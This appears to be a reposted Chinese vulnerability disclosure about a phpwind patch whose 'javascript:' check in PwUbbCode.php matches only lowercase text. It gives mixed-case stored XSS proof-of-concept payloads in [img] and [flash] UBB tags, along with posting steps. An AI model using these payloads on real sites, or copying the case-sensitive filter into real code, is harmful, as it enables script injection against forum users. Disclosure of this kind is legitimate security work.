好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

phpwind补丁发布导致新存储xss1 - 网站安全 - 自学

新发布的修复补丁引出该问题

http://www.phpwind.net/read/2993589 下载最新补丁代码PwUbbCode.php

 

添加了如下一个函数

 

 

if(strpos($path, 'javascript:')!==false) { return ''; }

 

这个是解决不了问题的,strpos只是检测了javascript的小写形式。

 

变换一下即可触发

 

 

 

 

漏洞 证明:回帖或者发帖处,

 

高级-》代码

 

 

 

ie6下触发。

 

 

 

[img]jAvascript:alert(document.domain)[/img]

 

 

在发帖回帖处写入

 

高级--》代码

 

[flash=480,400,1] jAvascript:alert(document.domain)[/flash]

 

 

 

各个 浏览器 应该都是可以触发的。

 

修复方案: 正则匹配 

 

查看更多关于phpwind补丁发布导致新存储xss1 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15011
  阅读:53次

上一篇: ecshop后台弱权限sql注入 - 网站安全 - 自学php

下一篇:帝友P2P借贷系统任意文件遍历 - 网站安全 - 自学

相关资讯